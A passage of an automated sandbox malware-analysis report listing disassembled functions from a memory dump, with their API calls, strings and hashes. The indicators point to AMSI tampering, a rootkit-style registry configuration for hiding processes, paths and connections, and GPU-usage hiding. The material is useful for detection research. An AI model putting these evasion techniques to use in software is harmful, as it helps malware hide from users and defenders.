Function 000002BCD7E31E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002BCD7E31E47
GetProcAddress.KERNEL32 ref: 000002BCD7E31E57
SleepEx.KERNELBASE ref: 000002BCD7E31E67

Strings

AmsiScanBuffer, xrefs: 000002BCD7E31E50
amsi.dll, xrefs: 000002BCD7E31E40

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 202e306d595dc7514faef03b027e8ea82594bb7e47ec9954c953192d7c6d2b0a
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 3ED0623C611A02DEE9186B11DC5D35433616B64B49FE4153FC50A42FB0EF3DC569D342

Function 000002BCD7E33A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002BCD7E33A35
PathFindFileNameW.SHLWAPI ref: 000002BCD7E33A44

Part of subcall function 000002BCD7E33F88: StrCmpNIW.SHLWAPI(?,?,?,000002BCD7E3272F), ref: 000002BCD7E33FA0

Part of subcall function 000002BCD7E33EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33EDB
Part of subcall function 000002BCD7E33EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F0E
Part of subcall function 000002BCD7E33EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F2E
Part of subcall function 000002BCD7E33EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F47
Part of subcall function 000002BCD7E33EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F68

CreateThread.KERNELBASE ref: 000002BCD7E33A8B

Part of subcall function 000002BCD7E31E74: GetCurrentThread.KERNEL32 ref: 000002BCD7E31E7F
Part of subcall function 000002BCD7E31E74: CreateThread.KERNELBASE ref: 000002BCD7E32043
Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32049
Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32055
Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32061
Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E3206D
Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32079
Part of subcall function 000002BCD7E31E74: TlsAlloc.KERNEL32 ref: 000002BCD7E32085

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: c10e3cbf1c16fcdc61345c24cd5b44bfa7570812c901633fb8882c6b9ebd82a9
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 3411253DA106078AFB64A721A54DBA933A1A79434BFB0423F941681FE2EF79C458C642

Function 000002BCD7E02EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000002BCD7E0302E

Memory Dump Source

Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 6e0f5f452ddfa5f4a1e10f075f6bb66dac2a2bd06e936dcf9448c5faf1cac316
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: DA91167AB012528FDB648F29D40CB6DB391F758B98F64813E9E4917F89DB38D812C711

Function 000002BCD7E31BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002BCD7E31724: GetProcessHeap.KERNEL32 ref: 000002BCD7E3172F
Part of subcall function 000002BCD7E31724: HeapAlloc.KERNEL32 ref: 000002BCD7E3173E
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E317AE
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E317DB
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E317F5
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31815
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E31830
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31850
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E3186B
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E3188B
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E318A6
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E318C6

SleepEx.KERNELBASE ref: 000002BCD7E31BDF

Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E318E1
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31901
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E3191C
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E3193C
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E31957
Part of subcall function 000002BCD7E31724: RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31977
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E31992
Part of subcall function 000002BCD7E31724: RegCloseKey.ADVAPI32 ref: 000002BCD7E3199C

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 76f9dcf75de2643a9e0101d2ae14af3a155aa21ad4ae906ab56445fb544a9feb
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: A7310A7D200E4389EB589B26D54936933A4AB4ABC2F24543F8E0DC7F96DF34C851C217

Non-executed Functions

Function 000002BCD7E32FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002BCD7E33094
lstrlenW.KERNEL32 ref: 000002BCD7E332BE

Part of subcall function 000002BCD7E31A30: OpenProcess.KERNEL32 ref: 000002BCD7E31A56
Part of subcall function 000002BCD7E31A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002BCD7E31A74
Part of subcall function 000002BCD7E31A30: PathFindFileNameW.SHLWAPI ref: 000002BCD7E31A83
Part of subcall function 000002BCD7E31A30: lstrlenW.KERNEL32 ref: 000002BCD7E31A8F
Part of subcall function 000002BCD7E31A30: StrCpyW.SHLWAPI ref: 000002BCD7E31AA2
Part of subcall function 000002BCD7E31A30: CloseHandle.KERNEL32 ref: 000002BCD7E31AB0

GetProcAddress.KERNEL32 ref: 000002BCD7E330A9

Part of subcall function 000002BCD7E33F88: StrCmpNIW.SHLWAPI(?,?,?,000002BCD7E3272F), ref: 000002BCD7E33FA0

StrCmpNIW.SHLWAPI ref: 000002BCD7E330EC
lstrlenW.KERNEL32 ref: 000002BCD7E33214

Strings

NtQueryObject, xrefs: 000002BCD7E3309F
ntdll.dll, xrefs: 000002BCD7E3308D
\Device\Nsi, xrefs: 000002BCD7E330DF

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 6c217d941e872c5fa1b4bdacac765491dbe85fcb64c7f565251486349f525500
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: DFB1C93A210A928AEB64CF25D408BA9B3A4F744B85F64503FEE1957FA6DF35CD84C341

Function 000002BCD7E384B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002BCD7E384CC
RtlCaptureContext.NTDLL ref: 000002BCD7E384F9
RtlLookupFunctionEntry.NTDLL ref: 000002BCD7E38513
RtlVirtualUnwind.NTDLL ref: 000002BCD7E38554
IsDebuggerPresent.KERNEL32 ref: 000002BCD7E385A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000002BCD7E385C5
UnhandledExceptionFilter.KERNEL32 ref: 000002BCD7E385D0

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 23f298a0121f5664ab260fffd6e15b24096aa1bfc7e4c172a7310a83b9ca8a39
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: DA31277A205B818AEB608F60E8443EA7364F784748F64413FDA4E47F99DF38C658C711

Function 000002BCD7E3CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002BCD7E3CE0B
RtlLookupFunctionEntry.NTDLL ref: 000002BCD7E3CE23
RtlVirtualUnwind.NTDLL ref: 000002BCD7E3CE5E
IsDebuggerPresent.KERNEL32 ref: 000002BCD7E3CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000002BCD7E3CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000002BCD7E3CEAC

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 371539b8e06e030ce6ce371ba05d1e919cdab070135ed372a556fc6e640a6b89
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 2641733A214B818AE760CF25E8443AE73A4F788758F60023BEA8D47F98DF38C555CB01

Function 000002BCD7E3DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000002BCD7E3DB99
FindNextFileW.KERNEL32 ref: 000002BCD7E3DCCF
FindClose.KERNEL32 ref: 000002BCD7E3DD0F
FindClose.KERNEL32 ref: 000002BCD7E3DD3B

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 2292e717bda1cb51af59dd0755a0791be3ddbc97c6a82045c8a77e3c6a35d091
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 5DA1F5367146824DFB20DB75A8883AD7BA1E781B95F64413FDE9827F99CB3AC441C702

Function 000002BCD7E31724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002BCD7E3172F
HeapAlloc.KERNEL32 ref: 000002BCD7E3173E

Part of subcall function 000002BCD7E31264: GetProcessHeap.KERNEL32 ref: 000002BCD7E3126A
Part of subcall function 000002BCD7E31264: HeapAlloc.KERNEL32 ref: 000002BCD7E31279
Part of subcall function 000002BCD7E31264: GetProcessHeap.KERNEL32 ref: 000002BCD7E31293
Part of subcall function 000002BCD7E31264: HeapAlloc.KERNEL32 ref: 000002BCD7E312A4

Part of subcall function 000002BCD7E31000: GetProcessHeap.KERNEL32 ref: 000002BCD7E31006
Part of subcall function 000002BCD7E31000: HeapAlloc.KERNEL32 ref: 000002BCD7E31015
Part of subcall function 000002BCD7E31000: GetProcessHeap.KERNEL32 ref: 000002BCD7E31028
Part of subcall function 000002BCD7E31000: HeapAlloc.KERNEL32 ref: 000002BCD7E31037

RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E317AE
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E317DB
RegCloseKey.ADVAPI32 ref: 000002BCD7E317F5
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31815
RegCloseKey.ADVAPI32 ref: 000002BCD7E31830
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31850
RegCloseKey.ADVAPI32 ref: 000002BCD7E3186B
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E3188B
RegCloseKey.ADVAPI32 ref: 000002BCD7E318A6
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E318C6
RegCloseKey.ADVAPI32 ref: 000002BCD7E318E1
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31901
RegCloseKey.ADVAPI32 ref: 000002BCD7E3191C
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E3193C
RegCloseKey.ADVAPI32 ref: 000002BCD7E31957
RegOpenKeyExW.ADVAPI32 ref: 000002BCD7E31977
RegCloseKey.ADVAPI32 ref: 000002BCD7E31992
RegCloseKey.ADVAPI32 ref: 000002BCD7E3199C

Part of subcall function 000002BCD7E312B8: RegQueryInfoKeyW.ADVAPI32 ref: 000002BCD7E31315
Part of subcall function 000002BCD7E312B8: GetProcessHeap.KERNEL32 ref: 000002BCD7E31323
Part of subcall function 000002BCD7E312B8: HeapAlloc.KERNEL32 ref: 000002BCD7E31334
Part of subcall function 000002BCD7E312B8: RegEnumValueW.ADVAPI32 ref: 000002BCD7E31393
Part of subcall function 000002BCD7E312B8: GetProcessHeap.KERNEL32 ref: 000002BCD7E313DB
Part of subcall function 000002BCD7E312B8: HeapAlloc.KERNEL32 ref: 000002BCD7E313E9
Part of subcall function 000002BCD7E312B8: GetProcessHeap.KERNEL32 ref: 000002BCD7E31406
Part of subcall function 000002BCD7E312B8: HeapFree.KERNEL32 ref: 000002BCD7E31414
Part of subcall function 000002BCD7E312B8: lstrlenW.KERNEL32 ref: 000002BCD7E3141D
Part of subcall function 000002BCD7E312B8: GetProcessHeap.KERNEL32 ref: 000002BCD7E3142B
Part of subcall function 000002BCD7E312B8: HeapAlloc.KERNEL32 ref: 000002BCD7E31439

Strings

tcp_remote, xrefs: 000002BCD7E31935
process_names, xrefs: 000002BCD7E31849
udp, xrefs: 000002BCD7E31970
tcp_local, xrefs: 000002BCD7E318FA
service_names, xrefs: 000002BCD7E318BF
startup, xrefs: 000002BCD7E317D1
SOFTWARE\$rbx-config, xrefs: 000002BCD7E3178E
paths, xrefs: 000002BCD7E31884
pid, xrefs: 000002BCD7E3180E

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 9123ef5016a16d6e93a775046e3d0dedcf023e30e2aedd2674ac46ebb93bfb99
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 6C71183A210F5289EB209F25E85969833A5FB89B8DF60113EDE4D87F28EF34C454C781

Function 000002BCD7E312B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002BCD7E31315
GetProcessHeap.KERNEL32 ref: 000002BCD7E31323
HeapAlloc.KERNEL32 ref: 000002BCD7E31334
RegEnumValueW.ADVAPI32 ref: 000002BCD7E31393

Part of subcall function 000002BCD7E31530: StrCmpIW.SHLWAPI ref: 000002BCD7E31561

GetProcessHeap.KERNEL32 ref: 000002BCD7E313DB
HeapAlloc.KERNEL32 ref: 000002BCD7E313E9
GetProcessHeap.KERNEL32 ref: 000002BCD7E31406
HeapFree.KERNEL32 ref: 000002BCD7E31414
lstrlenW.KERNEL32 ref: 000002BCD7E3141D
GetProcessHeap.KERNEL32 ref: 000002BCD7E3142B
HeapAlloc.KERNEL32 ref: 000002BCD7E31439
StrCpyW.SHLWAPI ref: 000002BCD7E3145B
GetProcessHeap.KERNEL32 ref: 000002BCD7E31472
HeapFree.KERNEL32 ref: 000002BCD7E31480

Strings

d, xrefs: 000002BCD7E31356

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 6043c043b50d77eae62dc2f412fe0c357a18dced22793f83868f9adb75034ea5
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 44515A36600B859AE720CF62E84935AB7A1F789F99F64413EDE4947B18EF3CC059C741

Function 000002BCD7E3EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000002BCD7E3F34A,?,?,00000000,000002BCD7E3F2CD), ref: 000002BCD7E3EFF5
GetLastError.KERNEL32(?,?,00000000,000002BCD7E3F2CD), ref: 000002BCD7E3F007
LoadLibraryExW.KERNEL32(?,?,00000000,000002BCD7E3F2CD), ref: 000002BCD7E3F049
VirtualProtect.KERNEL32 ref: 000002BCD7E3F0A5
VirtualProtect.KERNEL32 ref: 000002BCD7E3F0D6
FreeLibrary.KERNEL32(?,?,00000000,000002BCD7E3F2CD), ref: 000002BCD7E3F11A
GetProcAddress.KERNEL32(?,?,00000000,000002BCD7E3F2CD), ref: 000002BCD7E3F126

Strings

api-ms-, xrefs: 000002BCD7E3F01B
AppPolicyGetProcessTerminationMethod, xrefs: 000002BCD7E3F157, 000002BCD7E3F165
ext-ms-, xrefs: 000002BCD7E3F02E

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 1f7f6d952bf2f5faaf73dc81f8a8be130030cbc32d3845c6569f57b62c485a46
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 5D51C33A70170659EA149B56A8083A57390BB48BB9FA8073F9E3D07FD1EF38D455C742

Function 000002BCD7E333A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000002BCD7E333FD
GetProcessHeap.KERNEL32 ref: 000002BCD7E33412
HeapAlloc.KERNEL32 ref: 000002BCD7E33420
PdhGetCounterInfoW.PDH ref: 000002BCD7E33436
StrCmpW.SHLWAPI ref: 000002BCD7E3344B

Part of subcall function 000002BCD7E33950: StrCmpNW.SHLWAPI ref: 000002BCD7E33972
Part of subcall function 000002BCD7E33950: StrStrW.SHLWAPI ref: 000002BCD7E33990
Part of subcall function 000002BCD7E33950: StrToIntW.SHLWAPI ref: 000002BCD7E339B7

GetProcessHeap.KERNEL32 ref: 000002BCD7E33488
HeapFree.KERNEL32 ref: 000002BCD7E33496

Strings

\GPU Engine(*)\Running Time, xrefs: 000002BCD7E33444

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

